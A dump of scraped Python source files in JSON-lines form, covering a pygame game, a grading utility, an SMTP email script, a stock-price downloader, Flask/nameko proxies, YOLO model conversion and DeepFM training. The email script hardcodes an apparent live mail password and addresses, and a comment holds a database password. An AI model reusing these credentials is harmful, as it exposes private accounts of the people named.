Spritesheet(settings.SPRITESHEET_IMG)\n self.player_spritesheet = Spritesheet(settings.PLAYER_SPRITESHEET_IMG)\n self.enemies_spritesheet = Spritesheet(\n settings.ENEMIES_SPRITESHEET_IMG\n )\n self.explosions_spritesheet = Spritesheet(\n settings.EXPLOSIONS_SPRITESHEET_IMG\n )\n self.player_img = [\n self.player_spritesheet.get_image(p) for p in settings.PLAYER_IMG\n ]\n self.player_ico_img = self.spritesheet.get_image(\n settings.PLAYER_ICO_IMG\n )\n self.enemies_img = [\n self.enemies_spritesheet.get_image(e) for e in settings.ENEMIES_IMG\n ]\n self.bosses_img = [\n self.spritesheet.get_image(b) for b in settings.BOSSES_IMG\n ]\n self.meteors_img = [\n self.spritesheet.get_image(m) for m in settings.METEORS_IMG\n ]\n self.explosions_img = [\n self.explosions_spritesheet.get_image(e)\n for e in settings.EXPLOSIONS_IMG\n ]\n self.pows_img = [\n self.spritesheet.get_image(p) for p in settings.POWS_IMG\n ]\n self.laser_img = [\n self.spritesheet.get_image(l) for l in settings.LASER_IMG\n ]\n self.shield_img = [\n self.spritesheet.get_image(s) for s in settings.SHIELD_IMG\n ]\n self.shot_sfx = pygame.mixer.Sound(settings.SHOT_SFX)\n self.killed_sfx = pygame.mixer.Sound(settings.KILLED_SFX)\n self.explosion_sfx = pygame.mixer.Sound(settings.EXPLOSION_SFX)\n self.hit_sfx = pygame.mixer.Sound(settings.HIT_SFX)\n self.pows_sfx = [pygame.mixer.Sound(s) for s in settings.POWS_SFX]\n\n def over(self):\n \"\"\"Checks if the game is over.\"\"\"\n if self.player.lives == 0 and not self.explosions.sprites():\n # Kill the player after losing all lives.\n self.player.kill()\n","sub_path":"game/game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":8164,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"350403799","text":"# # напишите здесь функцию print_shopping_list(),\n# # подобрав уникальные названия продуктов и сложив значения\n# def print_shopping_list(pizza, salad):\n# key_pizza = set(pizza)\n# key_salad = set(salad)\n# union_key = key_pizza.union(key_salad)\n# #print(union_key)\n# count = 0\n#\n# for pozition in union_key:\n# for pozition_pizza, name_pizza in pizza.items():\n# for pozition_salad, name_salad in salad.items():\n# if pozition_pizza == pozition_salad == pozition:\n# count = name_pizza + name_salad\n# print(pozition, count)\n#\n# # else:\n# # print(pozition_pizza, name_pizza)\n# # #print(pozition_salad, name_salad)\n#\n#\n#\n# # for pozition_salad, name_salad in salad.items():\n# # if pozition_salad == pozition:\n# # count += name_salad\n# # print(pozition, name_salad)\n#\n# # def is_anyone_in(collection, city):\n# # if city in collection.values(): # если есть среди значений словаря collection\n# # print(city)\n# # for key, name in collection.items(): # переберите все ключи словаря\n# # if name == city: # если соответствующее ключу значение равно city\n# # print('В городе ' + city + ' живёт ' + key + '.')\n# # else:\n# # print('Пока никого.')\n#\n# # print(pizza.intersection(salad))\n#\n# pizza = {'мука, кг': 1,\n# 'помидоры, кг': 1.5,\n# 'шампиньоны, кг': 1.5,\n# 'сыр, кг': 0.8,\n# 'оливковое масло, л': 0.1,\n# 'дрожжи, г': 50}\n# salad = {'огурцы, кг': 1,\n# 'перцы, кг': 1,\n# 'помидоры, кг': 1.5,\n# 'оливковое масло, л': 0.1,\n# 'листья салата, кг': 0.4}\n#\n# print_shopping_list(pizza, salad)\n\n\n# напишите здесь функцию print_shopping_list(),\n# подобрав уникальные названия продуктов и сложив значения\ndef print_shopping_list(pizza, salad):\n\n sort_food = set(pizza)\n sort_food = sort_food.union(salad)\n\n for food in sort_food:\n weight = 0\n if food in pizza.keys():\n weight += pizza[food]\n if food in salad.keys():\n weight += salad[food]\n print(food,': ', weight, sep='')\n\npizza = {'мука, кг': 1,\n 'помидоры, кг': 1.5,\n 'шампиньоны, кг': 1.5,\n 'сыр, кг': 0.8,\n 'оливковое масло, л': 0.1,\n 'дрожжи, г': 50}\nsalad = {'огурцы, кг': 1,\n 'перцы, кг': 1,\n 'помидоры, кг': 1.5,\n 'оливковое масло, л': 0.1,\n 'листья салата, кг': 0.4}\n\nprint_shopping_list(pizza, salad)","sub_path":"sort_food.py","file_name":"sort_food.py","file_ext":"py","file_size_in_byte":3157,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"375262263","text":"import json\nimport os\nimport shutil\n\nfrom zipfile import ZipFile\nfrom datetime import datetime\nfrom slitools.infoutils import process_timestamp\n\n# Internal Constants\n_TYPE_SPECIFIER = '__type__'\n_PA_TIMESTAMP_FMT = '%A %x %X'\n_PA_LOCATION = os.path.join(os.path.expanduser('~'), '.sli-processed-archives-grading')\n_PA_JSON = os.path.join(_PA_LOCATION, '.processed.json')\n_PA_JSON_TMP = os.path.join(_PA_LOCATION, '.processed.json.tmp')\n\nLABEL_ASSIGNMENT_JSON = 'assignment.json'\n\nPROGRAM_DESC = {\n 'organize': \"A program that takes all zip files and attempts to extract them and create student \"\n \"directories as if they were dropbox zip files. The student directories are stored on a \"\n \"per assignment basis in the location given.\",\n 'analyze': \"A program that will verify submissions against a rubric from a json with the grader. If \"\n \"a program is misnamed a penalty is deducted according to the rubric. If it fails to run a penalty\"\n \"is deducted according to the rubric and so on.\"\n}\n\n\nclass TypedObject(object):\n def __init__(self, typed_object_type):\n self.__type__ = typed_object_type\n\n def get_type(self):\n return self.__type__\n\n def is_instance(self, obj):\n return isinstance(obj, TypedObject) and self.is_type(obj)\n\n def is_type(self, test):\n if isinstance(test, TypedObject):\n return self.__type__ == test.__type__\n elif isinstance(test, str):\n return self.__type__ == test\n else:\n return False\n\n\nclass ProcessedArchive(TypedObject):\n __type__ = 'ProcessedArchive'\n\n def __init__(self, key, value):\n super().__init__(ProcessedArchive.__type__)\n self._key = key\n self._value = value\n self._timestamp = datetime.now().strftime(_PA_TIMESTAMP_FMT)\n\n def key(self):\n return self._key\n\n def value(self):\n return self._value\n\n def path(self):\n return os.path.join(_PA_LOCATION, self.value())\n\n def timestamp(self):\n return self._timestamp\n\n def _update_time(self):\n self._timestamp = datetime.now().strftime(_PA_TIMESTAMP_FMT)\n\n def __str__(self):\n return \"{} ({}) : {}\".format(self.timestamp(), self.key(), self.value())\n\n\nclass Rubric(TypedObject):\n __type__ = 'Rubric'\n\n @staticmethod\n def _check_source_param(source_block):\n var1 = source_block['desc']\n var2 = source_block['value']\n\n return source_block\n\n @staticmethod\n def _check_func_param(source_block):\n var1 = source_block['command']\n var2 = source_block['desc']\n var3 = source_block['peanlty']\n var4 = source_block['value']\n\n def __init__(self, data):\n self.total = data['total']\n self.weight = data['weight']\n params = data['parameters']\n parent = None\n try:\n parent = 'parameters'\n self.due_date = process_timestamp(params['due_date']['time']) if 'time' in params['due_date'] else None\n self.due_penalty = params['due_date']['penalty'] if 'penalty' in params['due_date'] else 0\n self.problem_solving = params['problem_solving']\n self.in_lab = params['in_lab']\n self.output_check = params['output_check'] if 'output_check' in params else None\n\n parent += '.implementation' + '.functionality'\n impl_data = params['implementation']\n self.functionality = impl_data['functionality']\n\n if 'command' not in self.functionality or \\\n 'desc' not in self.functionality or \\\n 'penalty' not in self.functionality or \\\n 'value' not in self.functionality:\n raise KeyError('command or desc or penalty or value')\n\n self.required_files = impl_data['required_files']\n self.required_penalty = impl_data['required_files_penalty']\n\n parent = parent[:parent.rindex('.')]\n parent += '.source_code'\n source_data = impl_data['source_code']\n\n self.source_total = source_data['total']\n self.source_design = Rubric._check_source_param(source_data['design'])\n self.source_style = Rubric._check_source_param(source_data['style'])\n self.source_doc = Rubric._check_source_param(source_data['doc'])\n\n except KeyError as e:\n raise ValueError('Missing {} under {} in rubric!'.format(e.args[0], parent if parent else 'root'))\n\n super().__init__(Rubric.__type__)\n\n def has_output_check(self):\n return self.output_check is not None\n\n def has_due_date(self):\n return self.due_date is not None and self.due_penalty != 0\n\n\nclass Student(TypedObject):\n __type__ = 'Student'\n\n def __init__(self, name, submission_time, problem_solving=0, in_lab=0, funct=0, design=0, style=0, doc=0):\n super().__init__(Student.__type__)\n\n if isinstance(submission_time, str):\n submission_time = process_timestamp(submission_time)\n\n self.penalty = 0\n self._name = name\n self._submission = submission_time\n self._ps = problem_solving\n self._il = in_lab\n self._impl_total = funct + design + style + doc\n self._functionality = funct\n self._design = design\n self._style = style\n self._doc = doc\n self._late = False\n\n def init_to_rubric(self, rubric: Rubric):\n if rubric.has_due_date():\n if self._submission > rubric.due_date:\n self._late = True\n return\n\n self._ps = rubric.problem_solving\n self._il = rubric.in_lab\n self._functionality = rubric.functionality['value']\n self._design = rubric.source_design['value']\n self._style = rubric.source_style['value']\n self._doc = rubric.source_doc['value']\n self._impl_total = self._functionality + self._design + self._style + self._doc\n\n if self._impl_total + self._ps + self._il != rubric.total:\n raise RuntimeError('Invalid Rubric! Component Total != Rubric Total!')\n\n def name(self, new_name=None):\n if new_name:\n self._name = new_name\n\n return self._name\n\n def prob_solving(self, new_grade=None):\n if new_grade:\n self._ps = new_grade\n\n return self._ps\n\n def in_lab(self, new_grade=None):\n if new_grade:\n self._il = new_grade\n\n return self._il\n\n def submission_time(self):\n return self._submission\n\n def implementation(self):\n return self._functionality + self._design + self._style + self._doc\n\n def get_raw_points(self):\n return max(self.prob_solving() + self.implementation() + self.in_lab() - self.penalty, 0)\n\n def get_weighted(self, points_possible, weight_possible):\n return self.get_points(points_possible) * weight_possible\n\n def get_points(self, points_possible):\n return self.get_raw_points() / points_possible\n\n def __str__(self):\n return self.name()\n\n\nclass DefaultEncoder(json.JSONEncoder):\n def default(self, o):\n if isinstance(o, datetime):\n return process_timestamp(o)\n else:\n return o.__dict__\n\n\ndef common_decoder(obj):\n if _TYPE_SPECIFIER in obj:\n if obj[_TYPE_SPECIFIER] == 'Student':\n return Student(obj['_name'], obj['_submission'], obj['_ps'], obj['_il'], obj['_functionality'],\n obj['_design'], obj['_style'], obj['_doc'])\n elif obj[_TYPE_SPECIFIER] == 'ProcessedArchive':\n return ProcessedArchive(obj['_key'], obj['_value'])\n\n return obj\n\n\ndef json_load_rubric(filename):\n with open(filename) as df:\n data = json.load(df)\n\n return data\n\n\ndef json_load_students(filename):\n with open(filename) as df:\n data = json.load(df, object_hook=common_decoder)\n\n return data\n\n\ndef json_write(data, filepath, indent=4):\n if isinstance(data, dict):\n data = json.dumps(data, cls=DefaultEncoder, indent=indent, sort_keys=True)\n elif isinstance(data, str):\n json.loads(data, object_hook=common_decoder)\n else:\n raise TypeError('Data is not a JSON String nor a Dictionary mapping str -> Any')\n\n with open(filepath, 'w') as json_file:\n json_file.write(data)\n\n\ndef json_read(filepath):\n with open(filepath, 'r') as json_file:\n data = json.load(json_file, object_hook=common_decoder)\n\n return data\n\n\ndef get_processed_archives():\n return json_read(_PA_JSON)['pa']\n\n\ndef process_archive(key, filename):\n pa = ProcessedArchive(key, filename)\n\n data = json_read(_PA_JSON)\n data['pa'][pa.key()] = pa\n\n json_write(data, _PA_JSON_TMP)\n\n mv_file(filename, _PA_LOCATION)\n mv_file(_PA_JSON_TMP, _PA_JSON)\n return pa\n\n\ndef extract_archive(filename, dest, pwd=None):\n with ZipFile(filename, 'r') as src_zip:\n for name in src_zip.namelist():\n src_zip.extract(name, dest, pwd)\n\n\ndef rm_file(filename):\n if os.path.exists(filename):\n os.remove(filename)\n\n\ndef mv_file(source, target):\n filename = os.path.basename(source)\n\n if not target.endswith('/' + filename):\n target += '/' + filename\n elif not target.endswith(filename):\n target += filename\n\n if os.path.exists(target):\n os.remove(target)\n\n shutil.move(source, os.path.dirname(target))\n\n\ndef cp_file(source, target):\n filename = os.path.basename(source)\n\n if not target.endswith('/' + filename):\n target += '/' + filename\n elif not target.endswith(filename):\n target += filename\n\n if os.path.exists(target):\n os.remove(target)\n\n shutil.copy(source, target)\n\n\ndef get_filename(path):\n return os.path.basename(os.path.splitext(path)[0])\n\n\ndef get_file_ext(path):\n return os.path.splitext(path)[1]\n\nif __name__ != '__main__':\n # Establish Archiving Location\n if not os.path.exists(_PA_LOCATION):\n os.makedirs(_PA_LOCATION)\n\n # Establish initial PA JSON file\n if not os.path.exists(_PA_JSON):\n json_write(\"{\\\"pa\\\":{}}\", _PA_JSON)","sub_path":"slitools/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":10097,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"409794676","text":"#!/usr/bin/env python\n# encoding: utf-8\n\n\"\"\"\n@author: paul.xie\n@software: PyCharm\n@time: 2017/1/10 9:47\n\"\"\"\nfrom email.mime.text import MIMEText\nfrom email.mime.multipart import MIMEMultipart\nfrom email.header import Header\nfrom email.mime.image import MIMEImage\nimport smtplib\nmsg = MIMEMultipart('Hello')\n\nme = \"xie_wei_sh@foxmail.com\"\nyou = \"paul.xie@chinascope.com\"\nmsg[\"From\"] = Header(\"xie_wei_sh@foxmail.com\") # // 这个表示邮件发送人显示的\nmsg[\"Subject\"] = Header(\"Python 爱好者\", 'utf-8') # // 邮件标题\nmsg[\"To\"] = Header(\"paul.xie@chinascope.com\") # 收件人\n\ntext = \"Hi!\\nHow are you?\\nHere is the link you wanted:\\nhttps://www.python.org\"\nhtml = \"\"\"\\\n\n \n \n

Hi!
\n How are you?
\n Here is the link you wanted.\n

\n \n\n\"\"\"\npart1 = MIMEText(text, \"plain\")\npart2 = MIMEText(html, \"html\")\nwith open(\"001.jpg\", 'rb') as image:\n img = MIMEImage(image.read())\n part3 = img\n msg.attach(part3)\n\n\nmsg.attach(part1)\nmsg.attach(part2)\n\nserver = smtplib.SMTP(\"smtp.qq.com\", 587)\nserver.set_debuglevel(1)\nserver.starttls()\nserver.login(me, password=\"********\")\nserver.sendmail(me, you, msg=msg.as_string())\nserver.quit()\n\n\n# // yagmail 发信方式\n\nimport yagmail\n\nyag = yagmail.SMTP(\n user=\"xie_wei_sh@foxmail.com\",\n password=\"mengwu19bang56en\",\n host=\"smtp.qq.com\",\n port=587\n)\n\nyag.send(to=\"paul.xie@chinascope.com\", subject=\"邮件测试\", contents=['Hello', \"001.jpg\", \"email.docx\", \"test.txt\", \"UserManual.pdf\"])\n","sub_path":"Learn/2017_01_10_1.py","file_name":"2017_01_10_1.py","file_ext":"py","file_size_in_byte":1573,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"338192040","text":"import os.path\n\nfrom django.conf import settings\n\n# Application constants\nFILE_SELECT_DEFAULT = \"< Choose a file >\"\nDATA_FILE_PATH = os.path.join(settings.BASE_DIR, \"data\")\nFILE_SELECT_WIDGET_CLASS = \"custom-select bg-dark text-white h5 select-override\"\nCONTROL_PANEL_WIDGET_CLASS = \"card-label custom-select\"\nTRAINING_METHOD_CHOICES = [(\"Linear Regression\", \"Linear Regression\")]\nSPLITS_CHOICES = [(2, 2), (3, 3), (4, 4), (5, 5), (10, 10)]\nTRAINING_METHOD_INITIAL = \"Linear Regression\"\nSPLITS_INITIAL = 5\n","sub_path":"mlflow/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":506,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"119610445","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Sep 15 09:01:52 2017\n\n@author: Santosh Bag\n\"\"\"\nimport sys,csv\nimport nsepy\nimport datetime #import date, timedelta\nfrom pandas import DataFrame\nfrom sqlalchemy import create_engine\nimport mrigutilities\n\nnseStockList = open(\"F:/Mrig Analytics/Development/mrigAnalytics/notdownloaded.csv\",\"r\")\nerrorLog = open(\"errorLog.txt\",\"w\")\ntoday = datetime.datetime.now()\n#nseStockPrices = open(\"nseStockHistory.csv\",\"a+\")\n\ndata_folder = \"F:/Mrig Analytics/Development/data/\"\n\n#arguments = sys.argv[1:]\n\nstartdate= datetime.date(2018,1,2)\nenddate= datetime.date(2018,9,7)\n\n#startdate= datetime.date(int(arguments[0][0:4]),int(arguments[0][4:6]),int(arguments[0][6:8]))\n#enddate= datetime.date(int(arguments[1][0:4]),int(arguments[1][4:6]),int(arguments[1][6:8]))\nreader = csv.reader(nseStockList)\nstocks = [[row[1],row[0]] for row in reader]\n\n#stocks = nsepy.constants.symbol_list\n\nnseStockListLength = len(stocks)\nnseStocksDownloaded = 0\ncounter = 0\nwrite_counter = 0\nstocksdata = DataFrame()\n\nnseStockPrices = open(data_folder+\"nseStockHistory_\"+startdate.strftime(\"%d-%b-%Y\")+\"_\"+enddate.strftime(\"%d-%b-%Y\")+\".csv\",\"a+\")\n\nengine = mrigutilities.sql_engine()\ndisable_sql = \"alter table stock_history disable trigger return_trigger\"\nenable_sql = \"alter table stock_history enable trigger return_trigger\"\n\nengine.execute(disable_sql)\n#print(stocks)\n\n#engine = create_engine('postgresql+psycopg2://postgres:xanto007@localhost:5432/RB_WAREHOUSE')\n\ndatabase_cols = {'%Deliverble':'per_deliverable_volume'}\n\n#stocks = stocks[4:6]\nfor stock in stocks:\n #print(stock)\n counter = counter + 1\n #print(stock)\n if len(stocks) < 50:\n steps = len(stocks)\n else:\n steps = 50\n sys.stdout.write(\"\\r[%-*s] %d%%\" % (steps,'='*int(counter/(len(stocks)/steps)), int(100/len(stocks)*counter)))\n sys.stdout.flush()\n \n try:\n startdate = datetime.datetime.strptime(stock[1],'%m/%d/%y').date() + datetime.timedelta(days=1)\n \n stockdata = nsepy.get_history(symbol=stock[0],start=startdate,end=enddate)\n \n #print(stockdata)\n# if counter==1:\n# stocksdata = stockdata\n# else:\n print(stock)\n #print(stockdata)\n #stocksdata = stocksdata.append(stockdata)\n if stockdata.empty:\n errorLog.write(stock+\" not downloaded \\n\")\n else:\n nseStocksDownloaded = nseStocksDownloaded +1\n \n# if counter >=50:\n stockdata.index.rename('date',inplace=True)\n stockdata.rename(columns=lambda x: x.lower().replace(\" \",'_').replace('%deliverble','per_deliverable_volume'),inplace=True)\n # if write_counter >=1:\n stockdata.to_csv(nseStockPrices, header=False)\n stockdata.reset_index(level=0, inplace=True)\n stockdata = mrigutilities.clean_df_db_dups(stockdata,'stock_history',engine,dup_cols=[\"date\",\"symbol\",\"series\"],leftIdx=True)\n errorLog.write(stockdata[1]+\" already downloaded \\n\")\n stockdata = stockdata[0]\n \n stockdata.set_index('date',inplace=True)\n stockdata['close_adj'] = stockdata['close']\n stockdata['volume_adj'] = stockdata['volume']\n #print(stocksdata)\n stockdata.to_sql('stock_history',engine, if_exists='append', index=True)\n except:\n pass\nprint(str(nseStocksDownloaded) +\" Stocks downloaded of a total of \"+ str(nseStockListLength)+\" Stocks \")\nnseStockPrices.close()\nengine.execute(enable_sql)\nengine.dispose()\nerrorLog.close()\n","sub_path":"old/stockHistory_adhoc.py","file_name":"stockHistory_adhoc.py","file_ext":"py","file_size_in_byte":3502,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"509043824","text":"def fibb():\n a=0\n b=1\n while True:\n yield a\n # print(a)\n net=a+b\n a=b\n b=net\n\na=iter(fibb())\n\nfor i in range(20):\n print(next(a))\n\n\n\n","sub_path":"Firstproject/fibonacci.py","file_name":"fibonacci.py","file_ext":"py","file_size_in_byte":180,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"547834119","text":"from __future__ import absolute_import, unicode_literals\n\nimport re\n\nimport six\nfrom flask import g\nfrom nameko.standalone.rpc import ClusterRpcProxy\n\nfrom .connection_pool import ConnectionPool\nfrom .errors import (\n BadConfigurationError,\n ClusterNotConfiguredError\n)\n\n\nclass PooledClusterRpcProxy(object):\n\n _pool = None\n _config = None\n\n def __init__(self, config=None):\n if config:\n self.configure(config)\n\n def configure(self, config):\n if not config.get('AMQP_URI'):\n raise BadConfigurationError(\n \"Please provide a valid configuration.\")\n\n self._config = config\n self._pool = ConnectionPool(\n self._get_nameko_connection,\n initial_connections=config.get('INITIAL_CONNECTIONS', 2),\n max_connections=config.get('MAX_CONNECTIONS', 8),\n recycle=config.get('POOL_RECYCLE')\n )\n\n def _get_nameko_connection(self):\n proxy = ClusterRpcProxy(\n self._config,\n timeout=self._config.get('RPC_TIMEOUT', None)\n )\n return proxy.start()\n\n def get_connection(self):\n if not self._pool:\n raise ClusterNotConfiguredError(\n \"Please configure your cluster beore requesting a connection.\")\n return self._pool.get_connection()\n\n def release_connection(self, connection):\n return self._pool.release_connection(connection)\n\n\nclass LazyServiceProxy(object):\n def __init__(self, get_connection, service):\n self.get_connection = get_connection\n self.service = service\n\n def __getattr__(self, name):\n return getattr(getattr(self.get_connection(), self.service), name)\n\n\nclass FlaskPooledClusterRpcProxy(PooledClusterRpcProxy):\n def __init__(self, app=None, connect_on_method_call=True):\n self._connect_on_method_call = connect_on_method_call\n if app:\n self.init_app(app)\n\n def init_app(self, app):\n config = dict()\n for key, val in six.iteritems(app.config):\n match = re.match(r\"NAMEKO\\_(?P.*)\", key)\n if match:\n config[match.group('name')] = val\n self.configure(config)\n\n self._connect_on_method_call = config.get(\n 'NAMEKO_CONNECT_ON_METHOD_CALL',\n self._connect_on_method_call\n )\n\n app.teardown_appcontext(self._teardown_nameko_connection)\n\n def get_connection(self):\n connection = getattr(g, '_nameko_connection', None)\n if not connection:\n connection = super(\n FlaskPooledClusterRpcProxy, self).get_connection()\n g._nameko_connection = connection\n return connection\n\n def _teardown_nameko_connection(self, exception):\n connection = getattr(g, '_nameko_connection', None)\n if connection is not None:\n self.release_connection(connection)\n\n def _get_service(self, service):\n if self._connect_on_method_call:\n return LazyServiceProxy(lambda: self.get_connection(), service)\n else:\n return getattr(self.get_connection(), service)\n\n def __getattr__(self, name):\n return self._get_service(name)\n\n def __getitem__(self, name):\n return self._get_service(name)\n","sub_path":"flask_nameko/proxies.py","file_name":"proxies.py","file_ext":"py","file_size_in_byte":3280,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"315381758","text":"import os\nimport shutil\nfrom yolk.pypi import CheeseShop\n\nPACKAGE_NAME = 'flask-swagger-generator'\n\n\ndef get_latest_version_number(package_name):\n pkg, all_versions = CheeseShop().query_versions_pypi(package_name)\n if len(all_versions):\n return all_versions[0]\n return None\n\n\nif __name__ == \"__main__\":\n import sys\n\n sys.path.append('../')\n\n from flask_swagger_generator import get_version\n released_version = get_latest_version_number(PACKAGE_NAME)\n\n if released_version != get_version():\n os.chdir(\"../\")\n\n # Remove distribution directory if exists\n if os.path.isdir('dist'):\n shutil.rmtree('dist')\n\n os.system(\"python setup.py sdist bdist_wheel\")\n os.system(\"twine upload -r {} dist/*\".format(PACKAGE_NAME))\n os.system(\"twine upload -p $pipy_password -u $pipy_username dist/*\")\n","sub_path":"ci/upload_package.py","file_name":"upload_package.py","file_ext":"py","file_size_in_byte":865,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"61618740","text":"import numpy as np\nimport geopandas as gpd\n\nfrom pyinterpolate.data_processing.data_transformation.get_areal_centroids import get_centroids\n\n\ndef prepare_areal_shapefile(areal_file_address, id_column_name=None, value_coulmn_name=None,\n geometry_column_name='geometry', dropnans=True):\n \"\"\"\n Function prepares areal shapefile for processing and transforms it into numpy array. Function returns\n two lists.\n :param areal_file_address: (string) path to the shapefile with areal data,\n :param id_column_name: (string) id column name, if not provided then index column is treated as the id,\n :param value_coulmn_name: (string) value column name, if not provided then all values are set to nan,\n :param geometry_column_name: (string) default is 'geometry',\n :param dropnans: (bool) if true then rows with nans are dropped,\n :return: areal_array: (numpy array) [area_id, area_geometry, centroid coordinate x, centroid coordinate y, value]\n \"\"\"\n\n shapefile = gpd.read_file(areal_file_address)\n cols_to_hold = list()\n\n # Prepare index column\n if id_column_name is None:\n shapefile['id'] = shapefile.index\n cols_to_hold.append('id')\n else:\n cols_to_hold.append(id_column_name)\n\n # Prepare geometry column\n cols_to_hold.append(geometry_column_name)\n\n # Prepare value column\n if value_coulmn_name is None:\n shapefile['vals'] = np.nan\n cols_to_hold.append('vals')\n else:\n cols_to_hold.append(value_coulmn_name)\n\n # Remove unwanted columns\n gdf = shapefile.copy()\n for col in gdf.columns:\n if col not in cols_to_hold:\n gdf.drop(labels=col, axis=1, inplace=True)\n\n # Set order of columns\n gdf = gdf[cols_to_hold]\n\n # Remove rows with nan's\n if dropnans:\n gdf.dropna(axis=0, inplace=True)\n\n # Extract values into numpy array\n areal_array = gdf.values\n\n # Get areal centroids\n centroids = [get_centroids(x) for x in areal_array[:, 1]]\n centroids = np.array(centroids)\n\n # Combine data into areal dataset\n areal_dataset = np.c_[areal_array[:, :2], centroids, areal_array[:, -1]]\n\n return areal_dataset\n","sub_path":"pyinterpolate/data_processing/data_preparation/prepare_areal_shapefile.py","file_name":"prepare_areal_shapefile.py","file_ext":"py","file_size_in_byte":2183,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"609828684","text":"import pandas as pd\nfrom sklearn.metrics import log_loss, roc_auc_score\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.preprocessing import LabelEncoder, MinMaxScaler\n\nfrom deepctr.models import *\nfrom deepctr.feature_column import SparseFeat, DenseFeat, get_feature_names\n\nif __name__ == \"__main__\":\n data = pd.read_csv('/tmp/data/small_train.csv')\n # data = pd.read_csv('/tmp/data/avazu_data_100w_FE.csv')\n # train = data\n # test = input_test[input_test['day'] >= 29]\n # sparse_features = ['C' + str(i) for i in range(1, 27)]\n # dense_features = ['I' + str(i) for i in range(1, 14)]\n\n # sparse_features = ['C1', 'banner_pos', 'site_category', 'app_category',\n # 'device_type', 'device_conn_type', 'C18', 'hour', 'device_model','site_id']\n #\n # dense_features = [ 'site_domain', 'app_id', 'app_domain', 'device_ip',\n # 'C14', 'C17', 'C19', 'C20', 'C21']\n\n\n sparse_features = ['C1', 'banner_pos', 'site_category', 'app_category',\n 'device_type', 'device_conn_type', 'C18', 'hour', 'is_device', 'C_pix', 'C_site_id',\n 'C_site_domain', 'C_app_id', 'C_app_domain', 'C_device_ip',\n 'C_device_model', 'C_C14', 'C_C17', 'C_C19', 'C_C20', 'C_C21']\n\n data[sparse_features] = data[sparse_features].fillna('-1', )\n # data[dense_features] = data[dense_features].fillna(0, )\n target = ['click']\n\n # 1.Label Encoding for sparse features,and do simple Transformation for dense features\n for feat in sparse_features:\n lbe = LabelEncoder()\n data[feat] = lbe.fit_transform(data[feat])\n # mms = MinMaxScaler(feature_range=(0, 1))\n # data[dense_features] = mms.fit_transform(data[dense_features])\n\n # 2.count #unique features for each sparse field,and record dense feature field name\n\n # fixlen_feature_columns = [SparseFeat(feat, vocabulary_size=data[feat].nunique(), embedding_dim=4)\n # for i, feat in enumerate(sparse_features)] + [DenseFeat(feat, 1, )\n # for feat in dense_features]\n fixlen_feature_columns = [SparseFeat(feat, vocabulary_size=data[feat].nunique(), embedding_dim=4)\n for i, feat in enumerate(sparse_features)]\n\n dnn_feature_columns = fixlen_feature_columns\n linear_feature_columns = fixlen_feature_columns\n\n feature_names = get_feature_names(linear_feature_columns + dnn_feature_columns)\n\n # 3.generate input data for model\n\n train, test = train_test_split(data, test_size=0.2, random_state=2020)\n train_model_input = {name: train[name] for name in feature_names}\n test_model_input = {name: test[name] for name in feature_names}\n\n # 4.Define Model,train,predict and evaluate\n model = DeepFM(linear_feature_columns, dnn_feature_columns, task='binary')\n model.compile(\"adam\", \"binary_crossentropy\",\n metrics=['binary_crossentropy'], )\n\n history = model.fit(train_model_input, train[target].values,\n batch_size=256, epochs=10, verbose=2, validation_split=0.2, )\n pred_ans = model.predict(test_model_input, batch_size=256)\n print(\"test LogLoss\", round(log_loss(test[target].values, pred_ans), 4))\n print(\"test AUC\", round(roc_auc_score(test[target].values, pred_ans), 4))\n","sub_path":"test_dfm.py","file_name":"test_dfm.py","file_ext":"py","file_size_in_byte":3401,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"645843699","text":"import argparse\nfrom yolo_to_onnx import yolo_to_onnx\nfrom onnx_to_tensorrt import onnx_to_tensorrt\n \n \nparser = argparse.ArgumentParser()\nparser.add_argument(\"--weights\", default=\"yolov4.weights\",\n help=\"yolo weights path\")\nparser.add_argument(\"--config_file\", default=\"yolov4.cfg\",\n help=\"path to config file\")\nparser.add_argument(\"--data_file\", default=\"coco.names\",\n help=\"path to data file\")\n\nparser.add_argument('-v', '--verbose', action='store_true',\n help='enable verbose output (for debugging)')\nparser.add_argument('--int8', action='store_true',\n help='build INT8 TensorRT engine')\nparser.add_argument('--dla_core', type=int, default=-1,\n help='id of DLA core for inference (0 ~ N-1)')\nargs = parser.parse_args()\n\nonnx_file_path = yolo_to_onnx(args.weights, args.config_file, args.data_file)\nonnx_to_tensorrt(onnx_file_path, args.config_file, args.data_file, args.int8, args.dla_core, args.verbose)","sub_path":"prepared_models/prepare_model.py","file_name":"prepare_model.py","file_ext":"py","file_size_in_byte":1028,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"529796481","text":"import math, itertools\r\nfrom tqdm import tqdm\r\n\r\n#streak(n) > 1 implies 2|n+1 or n % 2 = 1 so n = 1 mod 2\r\n#streak(n) > 2 implies 2|n+1 and 3|n+2 or n = 1 mod 6\r\n#streak(n) > 3 implies 2|n+1 and 3|n+2 and 4|n+3 or n = 1 mod 12\r\n#streak(n) > 4 implies ... and 5|n+4 or n = 1 mod 60\r\n#streak(n) > 5 implies ... and 6|n+5 or n = 1 mod 60\r\n#streak(n) > 6 implies ... and 7|n+6 or n = 1 mod 420\r\n#So streak(n)=k is equivalent to n = 1 mod lcm(1,2,...,k) but n != 1 mod 